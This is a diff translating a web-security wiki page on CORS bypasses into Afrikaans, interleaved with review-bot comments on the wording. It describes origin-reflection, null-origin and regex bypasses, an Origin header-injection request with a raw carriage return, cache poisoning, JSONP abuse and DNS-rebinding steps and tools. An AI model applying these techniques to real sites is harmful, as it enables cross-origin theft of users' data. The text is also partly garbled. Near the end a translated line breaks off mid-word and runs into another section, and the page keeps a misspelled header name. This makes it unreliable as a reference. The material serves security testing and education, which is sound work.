-- **`Access-Control-Max-Age`**: This header indicates how long the results of a pre-flight request can be cached. The server sets the maximum time, in seconds, that the information returned by a pre-flight request may be reused. -- **`Access-Control-Request-Headers`**: Used in pre-flight requests, this header is set by the client to inform the server about which HTTP headers the client wants to use in the actual request. -- **`Access-Control-Request-Method`**: This header, also used in pre-flight requests, is set by the client to indicate which HTTP method will be used in the actual request. -- **`Origin`**: This header is automatically set by the browser and indicates the origin of the cross-origin request. It is used by the server to assess whether the incoming request should be allowed or denied based on the CORS policy. +Let daarop dat gewoonlik (afhangende van die inhoudstipe en koppe wat ingestel is) in 'n **GET/POST-versoek geen voorafgaande versoek gestuur word** (die versoek word **direk** gestuur), maar as jy toegang wil hê tot die **koppe/liggaam van die respons**, moet dit 'n _Access-Control-Allow-Origin_ kop bevat wat dit toelaat.\ +**Daarom beskerm CORS nie teen CSRF nie (maar dit kan nuttig wees).** +### **Voorafgaande versoek vir plaaslike netwerkversoeke** -Note that usually (depending on the content-type and headers set) in a **GET/POST request no pre-flight request is sent** (the request is sent **directly**), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.\ -**Therefore, CORS doesn't protect against CSRF (but it can be helpful).** +1. **`Access-Control-Request-Local-Network`**: Hierdie kop word ingesluit in die versoek van die kliënt om aan te dui dat die navraag gerig is op 'n plaaslike netwerkbron. Dit dien as 'n merker om die bediener in te lig dat die versoek afkomstig is van binne die plaaslike netwerk. 
-### **Local Network Requests Pre-flight request** - -1. **`Access-Control-Request-Local-Network`**: This header is included in the client's request to signify that the inquiry is aimed at a local network resource. It serves as a marker to inform the server that the request originates from within the local network. - -2. **`Access-Control-Allow-Local-Network`**: In response, servers utilize this header to communicate that the requested resource is permitted to be shared with entities outside of the local network. It acts as a green light for sharing resources across different network boundaries, ensuring controlled access while maintaining security protocols. - -A **valid response allowing the local network request** needs to have also in the response the header `Access-Controls-Allow-Local_network: true` : +2. **`Access-Control-Allow-Local-Network`**: In reaksie gebruik bedieners hierdie kop om te kommunikeer dat die versoekte bron toegelaat word om gedeel te word met entiteite buite die plaaslike netwerk. Dit dien as 'n groen lig vir die deling van hulpbronne oor verskillende netwerkgrense, terwyl beheerde toegang en sekuriteitsprotokolle gehandhaaf word. +'n **Geldige respons wat die plaaslike netwerkversoek toelaat**, moet ook die kop `Access-Controls-Allow-Local_network: true` in die respons hê: ``` HTTP/1.1 200 OK ... 
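Review bot: in the `@@ -104,26 +99,23 @@` hunk of cors-bypass.md the translated line keeps the source's header name `Access-Controls-Allow-Local_network: true`, which disagrees with `Access-Control-Allow-Local-Network: true` in the example response directly below it; the prose should use the same spelling as the example so a reader does not copy a header the browser will never match. Also in this hunk, "in versoek van die kliënt" needs the plural "versoeke", and the blank lines between the two numbered items were dropped, turning the list from loose to tight.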
@@ -134,139 +126,127 @@ Access-Control-Allow-Local-Network: true Content-Length: 0 ... ``` - {% hint style="warning" %} -Note that the linux **0.0.0.0** IP works to **bypass** these requirements to access localhost as that IP address is not considered "local". +Let daarop dat die linux **0.0.0.0** IP gebruik kan word om hierdie vereistes te **omseil** om toegang tot die localhost te verkry, aangesien daardie IP-adres nie as "plaaslik" beskou word nie. -It's also possible to **bypass the Local Network requirements** if you use the **public IP address of a local endpoint** (like the public IP of the router). Because in several occations, even if the **public IP** is being accessed, if it's **from the local network**, access will be granted. +Dit is ook moontlik om die vereistes van die plaaslike netwerk te **omseil** as jy die **openbare IP-adres van 'n plaaslike eindpunt** gebruik (soos die openbare IP van die router). Want in verskeie gevalle, selfs as die **openbare IP** benader word, as dit **van die plaaslike netwerk** af is, sal toegang verleen word. {% endhint %} -## Exploitable misconfigurations +## Uitbuitbare verkeerde konfigurasies -It has been observed that the setting of `Access-Control-Allow-Credentials` to **`true`** is a prerequisite for most **real attacks**. This setting permits the browser to send credentials and read the response, enhancing the attack's effectiveness. Without this, the benefit of making a browser issue a request over doing it oneself diminishes, as leveraging a user's cookies becomes unfeasible. +Daar is waargeneem dat die instelling van `Access-Control-Allow-Credentials` op **`true`** 'n voorvereiste is vir die meeste **werklike aanvalle**. Hierdie instelling maak dit vir die blaaier moontlik om geloofsbriewe te stuur en die respons te lees, wat die aanval se doeltreffendheid verbeter. 
Sonder dit verminder die voordeel van 'n blaaier wat 'n versoek uitreik in plaas daarvan om dit self te doen, aangesien dit onprakties word om 'n gebruiker se koekies te benut. -### Exception: Exploiting Network Location as Authentication +### Uitsondering: Uitbuiting van Netwerklokasie as Verifikasie -An exception exists where the victim's network location acts as a form of authentication. This allows for the victim's browser to be used as a proxy, circumventing IP-based authentication to access intranet applications. This method shares similarities in impact with DNS rebinding but is simpler to exploit. +Daar is 'n uitsondering waar die slagoffer se netwerklokasie as 'n vorm van verifikasie optree. Dit maak dit moontlik vir die slagoffer se blaaier om as 'n proksi gebruik te word, wat IP-gebaseerde verifikasie omseil om toegang tot intranettoepassings te verkry. Hierdie metode het ooreenkomste met DNS-herbinding wat impak betref, maar is makliker om uit te buit. -### Reflection of `Origin` in `Access-Control-Allow-Origin` - -The real-world scenario where the `Origin` header's value is reflected in `Access-Control-Allow-Origin` is theoretically improbable due to restrictions on combining these headers. However, developers seeking to enable CORS for multiple URLs may dynamically generate the `Access-Control-Allow-Origin` header by copying the `Origin` header's value. This approach can introduce vulnerabilities, particularly when an attacker employs a domain with a name designed to appear legitimate, thereby deceiving the validation logic. +### Weerspieëling van `Origin` in `Access-Control-Allow-Origin` +Die werklike scenario waar die waarde van die `Origin`-kop in `Access-Control-Allow-Origin` weerspieël word, is teoreties onwaarskynlik as gevolg van beperkings op die kombinasie van hierdie koppe. Tog kan ontwikkelaars wat CORS vir verskeie URL's wil aktiveer, die `Access-Control-Allow-Origin`-kop dinamies genereer deur die waarde van die `Origin`-kop te kopieer. 
Hierdie benadering kan kwesbaarhede inbring, veral wanneer 'n aanvaller 'n domein met 'n naam gebruik wat ontwerp is om legitiem te lyk en sodoende die valideringslogika te mislei. ```html ``` +### Uitbuiting van die `null` Oorsprong -### Exploiting the `null` Origin - -The `null` origin, specified for situations like redirects or local HTML files, holds a unique position. Some applications whitelist this origin to facilitate local development, inadvertently allowing any website to mimic a `null` origin through a sandboxed iframe, thus bypassing CORS restrictions. - +Die `null` oorsprong, wat gespesifiseer word vir situasies soos omleidings of plaaslike HTML-lêers, het 'n unieke posisie. Sommige toepassings lys hierdie oorsprong op om plaaslike ontwikkeling te fasiliteer, sonder om te besef dat enige webwerf 'n `null` oorsprong kan naboots deur middel van 'n gesandbokste ifram, en sodoende CORS-beperkings omseil. ```html ``` ```html ``` +### Gereelde Uitdrukkings Bypass Tegnieke -### Regular Expression Bypass Techniques +Wanneer jy te doen kry met 'n domein witlys, is dit noodsaaklik om te toets vir omseilingsgeleenthede, soos die byvoeging van die aanvaller se domein by 'n witgelyste domein of die uitbuiting van subdomein-oorgeneemde kwesbaarhede. Daarbenewens kan gereelde uitdrukkings wat gebruik word vir domeinvalidering, subtiliteite in domeinnaamkonvensies oorsien, wat verdere omseilingsgeleenthede bied. -When encountering a domain whitelist, it's crucial to test for bypass opportunities, such as appending the attacker's domain to a whitelisted domain or exploiting subdomain takeover vulnerabilities. Additionally, regular expressions used for domain validation may overlook nuances in domain naming conventions, presenting further bypass opportunities. +### Gevorderde Gereelde Uitdrukkings Omseilings -### Advanced Regular Expression Bypasses +Gereelde uitdrukkingspatrone fokus tipies op alfanumeriese, punt (.) 
en strepies (-) karakters, waarby ander moontlikhede oor die hoof gesien word. Byvoorbeeld, 'n domeinnaam wat ontwerp is om karakters in te sluit wat deur webblaaier en gereelde uitdrukkingspatrone verskillend geïnterpreteer word, kan sekuriteitskontroles omseil. Safari, Chrome en Firefox se hantering van onderstrepingskarakters in subdomeine illustreer hoe sulke verskille benut kan word om domeinvalideringslogika te omseil. -Regex patterns typically concentrate on alphanumeric, dot (.), and hyphen (-) characters, neglecting other possibilities. For example, a domain name crafted to include characters interpreted differently by browsers and regex patterns can bypass security checks. Safari, Chrome, and Firefox's handling of underscore characters in subdomains illustrates how such discrepancies can be exploited to circumvent domain validation logic. - -**For more information and settings of this bypass check:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **and** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +**Vir meer inligting en instellings van hierdie omseilingstoets:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **en** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) ![https://miro.medium.com/v2/resize:fit:720/format:webp/1*rolEK39-DDxeBgSq6KLKAA.png](<../.gitbook/assets/image (153).png>) -### From XSS inside a subdomain +### Vanaf XSS binne 'n subdomein -Developers often implement defensive mechanisms to protect against CORS exploitation by whitelisting domains that are permitted to 
request information. Despite these precautions, the system's security is not foolproof. The presence of even a single vulnerable subdomain within the whitelisted domains can open the door to CORS exploitation through other vulnerabilities, such as XSS (Cross-Site Scripting). - -To illustrate, consider the scenario where a domain, `requester.com`, is whitelisted to access resources from another domain, `provider.com`. The server-side configuration might look something like this: +Ontwikkelaars implementeer dikwels verdedigingsmeganismes om te beskerm teen CORS-uitbuiting deur domeine wat toegelaat word om inligting aan te vra, op 'n witlys te plaas. Ten spyte van hierdie voorbehoud is die stelsel se sekuriteit nie waterdig nie. Die teenwoordigheid van selfs 'n enkele kwesbare subdomein binne die witgelyste domeine kan die deur oopmaak vir CORS-uitbuiting deur ander kwesbaarhede, soos XSS (Cross-Site Scripting). +Om dit te illustreer, oorweeg die scenario waar 'n domein, `requester.com`, op die witlys geplaas word om toegang tot hulpbronne van 'n ander domein, `provider.com`, te verkry. Die bedienerkant-konfigurasie kan iets soos dit lyk: ```javascript if ($_SERVER['HTTP_HOST'] == '*.requester.com') { - // Access data +// Access data } else { - // Unauthorized access +// Unauthorized access } ``` - -In this setup, all subdomains of `requester.com` are allowed access. However, if a subdomain, say `sub.requester.com`, is compromised with an XSS vulnerability, an attacker can leverage this weakness. For example, an attacker with access to `sub.requester.com` could exploit the XSS vulnerability to bypass CORS policies and maliciously access resources on `provider.com`. +In hierdie opset word toegang tot alle subdomeine van `requester.com` toegelaat. As 'n subdomein, byvoorbeeld `sub.requester.com`, egter gekompromitteer word met 'n XSS-gebrek, kan 'n aanvaller hierdie swakheid benut. 
Byvoorbeeld, 'n aanvaller met toegang tot `sub.requester.com` kan die XSS-gebrek uitbuit om CORS-beleide te omseil en kwaadwillig toegang te verkry tot hulpbronne op `provider.com`. -### **Server-side cache poisoning** +### **Bedienerkant-cachevergiftiging** -**[From this research](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)** +**[Vanaf hierdie navorsing](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)** -It's possible that by exploiting server-side cache poisoning through HTTP header injection, a stored Cross-Site Scripting (XSS) vulnerability can be induced. This scenario unfolds when an application fails to sanitize the `Origin` header for illegal characters, creating a vulnerability particularly for Internet Explorer and Edge users. These browsers treat `\r` (0x0d) as a legitimate HTTP header terminator, leading to HTTP header injection vulnerabilities. - -Consider the following request where the `Origin` header is manipulated: +Dit is moontlik dat deur bedienerkant-cachevergiftiging te benut deur middel van HTTP-kopinspuiting, 'n gestoorde Cross-Site Scripting (XSS)-gebrek geïnduseer kan word. Hierdie scenario ontvou wanneer 'n toepassing nie die `Origin`-kop vir onwettige karakters sanitiseer nie, wat 'n kwesbaarheid skep, veral vir Internet Explorer- en Edge-gebruikers. Hierdie webblaaier behandel `\r` (0x0d) as 'n legitieme HTTP-kopterminator, wat lei tot HTTP-kopinspuitingskwesbaarhede. 
+Oorweeg die volgende versoek waar die `Origin`-kop gemanipuleer word: ```text GET / HTTP/1.1 Origin: z[0x0d]Content-Type: text/html; charset=UTF-7 ``` - -Internet Explorer and Edge interpret the response as: - +Internet Explorer en Edge interpreteer die respons as: ```text HTTP/1.1 200 OK Access-Control-Allow-Origin: z Content-Type: text/html; charset=UTF-7 ``` +Terwyl dit nie prakties is om hierdie kwesbaarheid direk uit te buit deur 'n webblaaier 'n verkeerde kop te laat stuur nie, kan 'n gekonstrueerde versoek handmatig gegenereer word met behulp van hulpmiddels soos Burp Suite. Hierdie metode kan lei tot 'n bedienerkant-cache wat die respons stoor en dit onbedoeld aan ander dien. Die gekonstrueerde lading is daarop gemik om die karakterstel van die bladsy te verander na UTF-7, 'n karakterenkodering wat dikwels geassosieer word met XSS-kwesbaarhede as gevolg van sy vermoë om karakters op 'n manier te enkodeer wat as skrips uitgevoer kan word in sekere kontekste. -While directly exploiting this vulnerability by making a web browser send a malformed header is not feasible, a crafted request can be manually generated using tools like Burp Suite. This method could lead to a server-side cache saving the response and inadvertently serving it to others. The crafted payload aims to alter the page's character set to UTF-7, a character encoding often associated with XSS vulnerabilities due to its ability to encode characters in a way that can be executed as script in certain contexts. +Vir verdere lees oor gestoorde XSS-kwesbaarhede, sien [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored). -For further reading on stored XSS vulnerabilities, see [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored). 
- -**Note**: The exploitation of HTTP header injection vulnerabilities, particularly through server-side cache poisoning, underscores the critical importance of validating and sanitizing all user-supplied input, including HTTP headers. Always employ a robust security model that includes input validation to prevent such vulnerabilities. +**Opmerking**: Die uitbuiting van HTTP-kopinspuitingskwesbaarhede, veral deur bedienerkant-cachevergiftiging, beklemtoon die kritieke belangrikheid van die validering en sanitisering van alle gebruikersverskafte insette, insluitend HTTP-koppe. Maak altyd gebruik van 'n robuuste sekuriteitsmodel wat insetvalidering insluit om sulke kwesbaarhede te voorkom. -### **Client-Side cache poisoning** +### **Kliëntkant-cachevergiftiging** -**[From this research](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)** +**[Van hierdie navorsing](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)** -In this scenario, an instance of a web page reflecting the contents of a custom HTTP header without proper encoding is observed. Specifically, the web page reflects back the contents included in a `X-User-id` header, which could include malicious JavaScript, as demonstrated by the example where the header contains an SVG image tag designed to execute JavaScript code on load. +In hierdie scenario word 'n geval van 'n webbladsy waargeneem wat die inhoud van 'n aangepaste HTTP-kop sonder behoorlike enkodering weerspieël. Spesifiek weerspieël die webbladsy die inhoud wat in 'n `X-User-id`-kop ingesluit is, wat kwaadwillige JavaScript kan insluit, soos gedemonstreer deur die voorbeeld waar die kop 'n SVG-beeldtag bevat wat ontwerp is om JavaScript-kode by die laai uit te voer. -Cross-Origin Resource Sharing (CORS) policies allow for the sending of custom headers. 
However, without the response being directly rendered by the browser due to CORS restrictions, the utility of such an injection might seem limited. The critical point arises when considering the browser's cache behavior. If the `Vary: Origin` header is not specified, it becomes possible for the malicious response to be cached by the browser. Subsequently, this cached response could be rendered directly when navigating to the URL, bypassing the need for direct rendering upon the initial request. This mechanism enhances the reliability of the attack by leveraging client-side caching. +Cross-Origin Resource Sharing (CORS)-beleide maak die stuur van aangepaste koppe moontlik. Sonder dat die blaaier die respons direk weergee as gevolg van CORS-beperkings, mag die nut van so 'n inspuiting beperk lyk. Die kritieke punt ontstaan wanneer die blaaier se cache-gedrag oorweeg word. As die `Vary: Origin`-kop nie gespesifiseer word nie, word dit moontlik dat die kwaadwillige respons deur die blaaier gestoor kan word. Hierdie gestoorde respons kan vervolgens direk weergegee word wanneer na die URL genavigeer word, sonder die behoefte aan direkte weergawe tydens die aanvanklike versoek. Hierdie meganisme verbeter die betroubaarheid van die aanval deur gebruik te maak van kliëntkant-cache. -To illustrate this attack, a JavaScript example is provided, designed to be executed in the environment of a web page, such as through a JSFiddle. This script performs a simple action: it sends a request to a specified URL with a custom header containing the malicious JavaScript. Upon successful request completion, it attempts to navigate to the target URL, potentially triggering the execution of the injected script if the response has been cached without proper handling of the `Vary: Origin` header. 
- -Here's a summarized breakdown of the JavaScript used to execute this attack: +Om hierdie aanval te illustreer, word 'n JavaScript-voorbeeld verskaf wat ontwerp is om uitgevoer te word in die omgewing van 'n webbladsy, soos deur 'n JSFiddle. Hierdie skrips voer 'n eenvoudige aksie uit: dit stuur 'n versoek na 'n gespesifiseerde URL met 'n aangepaste kop wat die kwaadwillige JavaScript bevat. Na suksesvolle voltooiing van die versoek, probeer dit na die teiken-URL navigeer, wat moontlik die uitvoering van die ingeslote skrips kan veroorsaak as die respons gestoor is sonder behoorlike hantering van die `Vary: Origin`-kop. +Hier is 'n opsomming van die gebruikte JavaScript om hierdie aanval uit te voer: ```html ``` - -## Bypass +## Omsingeling ### XSSI (Cross-Site Script Inclusion) / JSONP -XSSI, also known as Cross-Site Script Inclusion, is a type of vulnerability that takes advantage of the fact that the Same Origin Policy (SOP) does not apply when including resources using the script tag. This is because scripts need to be able to be included from different domains. This vulnerability allows an attacker to access and read any content that was included using the script tag. +XSSI, ook bekend as Cross-Site Script Inclusion, is 'n tipe kwesbaarheid wat gebruik maak van die feit dat die Same Origin Policy (SOP) nie van toepassing is wanneer hulpbronne ingesluit word met behulp van die skripsie-etiket nie. Dit is omdat skripsies vanaf verskillende domeine ingesluit moet kan word. Hierdie kwesbaarheid stel 'n aanvaller in staat om toegang te verkry tot enige inhoud wat ingesluit is met behulp van die skripsie-etiket. -This vulnerability becomes particularly significant when it comes to dynamic JavaScript or JSONP (JSON with Padding), especially when ambient-authority information like cookies are used for authentication. When requesting a resource from a different host, the cookies are included, making them accessible to the attacker. 
+Hierdie kwesbaarheid word veral belangrik wanneer dit kom by dinamiese JavaScript of JSONP (JSON met Padding), veral wanneer omgewingsgesag-inligting soos koekies gebruik word vir outentisering. Wanneer 'n hulpbron van 'n ander gasheer aangevra word, word die koekies ingesluit, wat dit vir die aanvaller toeganklik maak. -To better understand and mitigate this vulnerability, you can use the BurpSuite plugin available at [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp). This plugin can help identify and address potential XSSI vulnerabilities in your web applications. +Om hierdie kwesbaarheid beter te verstaan en te verminder, kan jy die BurpSuite-inprop gebruik wat beskikbaar is by [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp). Hierdie inprop kan help om potensiële XSSI-kwesbaarhede in jou webtoepassings te identifiseer en aan te spreek. -[**Read more about the difefrent types of XSSI and how to exploit them here.**](xssi-cross-site-script-inclusion.md) +[**Lees meer oor die verskillende tipes XSSI en hoe om dit uit te buit hier.**](xssi-cross-site-script-inclusion.md) -Try to add a **`callback`** **parameter** in the request. Maybe the page was prepared to send the data as JSONP. In that case the page will send back the data with `Content-Type: application/javascript` which will bypass the CORS policy. +Probeer om 'n **`callback`** **parameter** by die versoek te voeg. Miskien is die bladsy voorberei om die data as JSONP te stuur. In daardie geval sal die bladsy die data terugstuur met `Content-Type: application/javascript`, wat die CORS-beleid sal omseil. ![](<../.gitbook/assets/image (229).png>) -### Easy (useless?) bypass +### Maklike (nuttelose?) omsingeling -One way to bypass the `Access-Control-Allow-Origin` restriction is by requesting a web application to make a request on your behalf and send back the response. 
However, in this scenario, the credentials of the final victim won't be sent as the request is made to a different domain. +Een manier om die `Access-Control-Allow-Origin`-beperking te omseil, is deur 'n webtoepassing te versoek om 'n versoek namens jou te maak en die respons terug te stuur. In hierdie scenario sal die legitimasie van die finale slagoffer nie gestuur word nie, aangesien die versoek na 'n ander domein gemaak word. -1. [**CORS-escape**](https://github.com/shalvah/cors-escape): This tool provides a proxy that forwards your request along with its headers, while also spoofing the Origin header to match the requested domain. This effectively bypasses the CORS policy. Here's an example usage with XMLHttpRequest: - -2. [**simple-cors-escape**](https://github.com/shalvah/simple-cors-escape): This tool offers an alternative approach to proxying requests. Instead of passing on your request as-is, the server makes its own request with the specified parameters. +1. [**CORS-escape**](https://github.com/shalvah/cors-escape): Hierdie instrument bied 'n proksi wat jou versoek saam met sy koppe deurstuur, terwyl dit ook die Origin-kopie vervals om ooreen te stem met die versoekte domein. Dit omseil effektief die CORS-beleid. Hier is 'n voorbeeld van gebruik met XMLHttpRequest: -### Iframe + Popup Bypass +2. [**simple-cors-escape**](https://github.com/shalvah/simple-cors-escape): Hierdie instrument bied 'n alternatiewe benadering tot proksi-versoeke. In plaas daarvan om jou versoek soos dit is deur te gee, maak die bediener sy eie versoek met die gespesifiseerde parameters. -You can **bypass CORS checks** such as `e.origin === window.origin` by **creating an iframe** and **from it opening a new window**. More information in the following page: +### Iframe + Popup Omsingeling + +Jy kan **CORS-toetse omseil**, soos `e.origin === window.origin`, deur 'n ifram te skep en van daar af 'n nuwe venster oop te maak. 
Meer inligting in die volgende bladsy: {% content-ref url="xss-cross-site-scripting/iframes-in-xss-and-csp.md" %} [iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md) 
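Review bot: `## Bypass` is translated as `## Omsingeling` (likewise `### Maklike (nuttelose?) omsingeling` and `### Iframe + Popup Omsingeling`), but omsingeling means encirclement; the rest of this hunk already uses omseil/omseiling for bypass, so use `## Omseiling` throughout, and `### Gereelde Uitdrukkings Bypass Tegnieke` still contains the untranslated word Bypass while the next heading uses Omseilings. Other wording to fix in this hunk: `ifram` (twice) for iframe; `die Origin-kopie vervals` should be `Origin-kop` (kopie is a copy); `legitimasie van die finale slagoffer` where `geloofsbriewe` is used earlier for credentials; `skripsie-etiket` and `skripsies` for the script tag where the hunk otherwise says `skrips`; `CORS-toetse omseil` for CORS checks where `kontroles` is used elsewhere; and `Hierdie webblaaier behandel` needs the plural `webblaaiers` since it refers to Internet Explorer and Edge. In the code snippet the indentation of `// Access data` and `// Unauthorized access` was stripped; a translation commit should leave code formatting untouched, and while there the fence tagged `javascript` wraps PHP (`$_SERVER['HTTP_HOST']`).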
@@ -313,85 +292,79 @@ You can **bypass CORS checks** such as `e.origin === window.origin` by **creatin ### DNS Rebinding via TTL -DNS rebinding via TTL is a technique used to bypass certain security measures by manipulating DNS records. Here's how it works: +DNS rebinding via TTL is 'n tegniek wat gebruik word om sekere sekuriteitsmaatreëls te omseil deur DNS-rekords te manipuleer. So werk dit: -1. The attacker creates a web page and makes the victim access it. -2. The attacker then changes the DNS (IP) of their own domain to point to the victim's web page. -3. The victim's browser caches the DNS response, which may have a TTL (Time to Live) value indicating how long the DNS record should be considered valid. -4. When the TTL expires, the victim's browser makes a new DNS request, allowing the attacker to execute JavaScript code on the victim's page. -5. By maintaining control over the IP of the victim, the attacker can gather information from the victim without sending any cookies to the victim server. +1. Die aanvaller skep 'n webbladsy en laat die slagoffer dit besoek. +2. Die aanvaller verander dan die DNS (IP) van hul eie domein om na die slagoffer se webbladsy te verwys. +3. Die slagoffer se blaaier stoor die DNS-respons, wat 'n TTL (Time to Live) waarde kan hê wat aandui hoe lank die DNS-rekord as geldig beskou moet word. +4. Wanneer die TTL verval, maak die slagoffer se blaaier 'n nuwe DNS-versoek, wat die aanvaller in staat stel om JavaScript-kode op die slagoffer se bladsy uit te voer. +5. Deur beheer oor die IP van die slagoffer te behou, kan die aanvaller inligting van die slagoffer versamel sonder om enige koekies na die slagofferbediener te stuur. -It's important to note that browsers have caching mechanisms that may prevent immediate abuse of this technique, even with low TTL values. +Dit is belangrik om daarop te let dat blaaier kantvergrendelingsmeganismes het wat dadelike misbruik van hierdie tegniek mag voorkom, selfs met lae TTL-waardes. 
-DNS rebinding can be useful for bypassing explicit IP checks performed by the victim or for scenarios where a user or bot remains on the same page for an extended period, allowing the cache to expire. +DNS rebinding kan nuttig wees om eksplisiete IP-kontroles wat deur die slagoffer uitgevoer word, te omseil, of vir scenario's waar 'n gebruiker of robot vir 'n lang tydperk op dieselfde bladsy bly, wat die cache laat verval. -If you need a quick way to abuse DNS rebinding, you can use services like [https://lock.cmpxchg8b.com/rebinder.html](https://lock.cmpxchg8b.com/rebinder.html). +As jy 'n vinnige manier nodig het om DNS rebinding te misbruik, kan jy dienste soos [https://lock.cmpxchg8b.com/rebinder.html](https://lock.cmpxchg8b.com/rebinder.html) gebruik. -To run your own DNS rebinding server, you can utilize tools like **DNSrebinder** ([https://github.com/mogwailabs/DNSrebinder](https://github.com/mogwailabs/DNSrebinder)). This involves exposing your local port 53/udp, creating an A record pointing to it (e.g., ns.example.com), and creating an NS record pointing to the previously created A subdomain (e.g., ns.example.com). Any subdomain of the ns.example.com subdomain will then be resolved by your host. +Om jou eie DNS rebinding-bediener te bedryf, kan jy gereedskap soos **DNSrebinder** ([https://github.com/mogwailabs/DNSrebinder](https://github.com/mogwailabs/DNSrebinder)) gebruik. Dit behels die blootstelling van jou plaaslike poort 53/udp, die skep van 'n A-rekord wat daarna verwys (bv. ns.example.com), en die skep van 'n NS-rekord wat na die vorige geskepte A-subdomein verwys (bv. ns.example.com). Enige subdomein van die ns.example.com-subdomein sal dan deur jou gasheer opgelos word. -You can also explore a publicly running server at [http://rebind.it/singularity.html](http://rebind.it/singularity.html) for further understanding and experimentation. 
+Jy kan ook 'n openbare bediener verken by [http://rebind.it/singularity.html](http://rebind.it/singularity.html) vir verdere begrip en eksperimentering. -### DNS Rebinding via **DNS Cache Flooding** +### DNS Rebinding via **DNS-cache-oorstroming** -DNS rebinding via DNS cache flooding is another technique used to bypass the caching mechanism of browsers and force a second DNS request. Here's how it works: +DNS rebinding via DNS-cache-oorstroming is 'n ander tegniek wat gebruik word om die kasgeheue van blaaier te omseil en 'n tweede DNS-versoek af te dwing. So werk dit: -1. Initially, when the victim makes a DNS request, it is responded with the attacker's IP address. -2. To bypass the caching defense, the attacker leverages a service worker. The service worker floods the DNS cache, which effectively deletes the cached attacker server name. -3. When the victim's browser makes a second DNS request, it is now responded with the IP address 127.0.0.1, which typically refers to the localhost. +1. Aanvanklik, wanneer die slagoffer 'n DNS-versoek maak, word daar gereageer met die IP-adres van die aanvaller. +2. Om die kasverdediging te omseil, maak die aanvaller gebruik van 'n dienswerker. Die dienswerker oorstroom die DNS-kas, wat die gekasgeheueerde aanvallerbediener se naam effektief uitvee. +3. Wanneer die slagoffer se blaaier 'n tweede DNS-versoek maak, word daar nou gereageer met die IP-adres 127.0.0.1, wat tipies na die plaaslike gasheer verwys. -By flooding the DNS cache with the service worker, the attacker can manipulate the DNS resolution process and force the victim's browser to make a second request, this time resolving to the attacker's desired IP address. +Deur die DNS-kas met die dienswerker te oorstroom, kan die aanvaller die DNS-oplossingsproses manipuleer en die slagoffer se blaaier dwing om 'n tweede versoek te maak wat hierdie keer na die gewenste IP-adres van die aanvaller oplos. 
-### DNS Rebinding via **Cache** +### DNS Rebinding via **Kas** -Another way to bypass the caching defense is by utilizing multiple IP addresses for the same subdomain in the DNS provider. Here's how it works: +'n Ander manier om die kasverdediging te omseil, is deur gebruik te maak van verskeie IP-adresse vir dieselfde subdomein in die DNS-leweransier. So werk dit: -1. The attacker sets up two A records (or a single A record with two IPs) for the same subdomain in the DNS provider. -2. When a browser checks for these records, it receives both IP addresses. -3. If the browser decides to use the attacker's IP address first, the attacker can serve a payload that performs HTTP requests to the same domain. -4. However, once the attacker obtains the victim's IP address, they stop responding to the victim's browser. -5. The victim's browser, upon realizing that the domain is unresponsive, moves on to use the second given IP address. -6. By accessing the second IP address, the browser bypasses the Same Origin Policy (SOP), allowing the attacker to abuse this and gather and exfiltrate information. +1. Die aanvaller stel twee A-rekords (of 'n enkele A-rekord met twee IP-adresse) op vir dieselfde subdomein in die DNS-leweransier. +2. Wanneer 'n blaaier hierdie rekords nagaan, ontvang dit beide IP-adresse. +3. As die blaaier besluit om die aanvaller se IP-adres eerste te gebruik, kan die aanvaller 'n nutslading dien wat HTTP-versoeke na dieselfde domein uitvoer. +4. Sodra die aanvaller egter die slagoffer se IP-adres verkry, hou hulle op om op die slagoffer se blaaier te reageer. +5. Die slagoffer se blaaier, nadat dit besef dat die domein onbeskikbaar is, gaan voort om die tweede gegee IP-adres te gebruik. +6. Deur toegang tot die tweede IP-adres te verkry, omseil die blaaier die Same Origin Policy (SOP), wat die aanvaller in staat stel om hierdie te misbruik en inligting van die slagoffer te versamel en uit te voer. 
-This technique leverages the behavior of browsers when multiple IP addresses are provided for a domain. By strategically controlling the responses and manipulating the browser's choice of IP address, an attacker can exploit the SOP and access information from the victim. +Hierdie tegniek maak gebruik van die gedrag van blaaier wanneer verskeie IP-adresse vir 'n domein verskaf word. Deur die antwoorde strategies te beheer en die blaaier se keuse van IP-adres te manipuleer, kan 'n aanvaller die SOP uitbuit en toegang verkry tot inligting van die slagoffer. {% hint style="warning" %} -Note that in order to access localhost you should try to rebind **127.0.0.1** in Windows and **0.0.0.0** in linux.\ -Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0" +Let daarop dat jy, om toegang tot localhost te verkry, moet probeer om **127.0.0.1** in Windows en **0.0.0.0** in Linux te herbind.\ +Verskaffers soos godaddy of cloudflare het my nie toeg +### Ander algemene omseilings - -{% endhint %} +* As **interne IP-adresse nie toegelaat word nie**, het hulle dalk **vergeet om 0.0.0.0 te verbied** (werk op Linux en Mac) +* As **interne IP-adresse nie toegelaat word nie**, reageer met 'n **CNAME** na **localhost** (werk op Linux en Mac) +* As **interne IP-adresse nie toegelaat word nie** as DNS-antwoorde nie, kan jy **CNAMEs na interne dienste** soos www.corporate.internal antwoord. -For more info you can check [https://unit42.paloaltonetworks.com/dns-rebinding/](https://unit42.paloaltonetworks.com/dns-rebinding/) +### Gewapende DNS Rebidding -### Other Common Bypasses +Jy kan meer inligting oor die vorige omseilings tegnieke en hoe om die volgende instrument te gebruik, vind in die praatjie [Gerald Doussot - 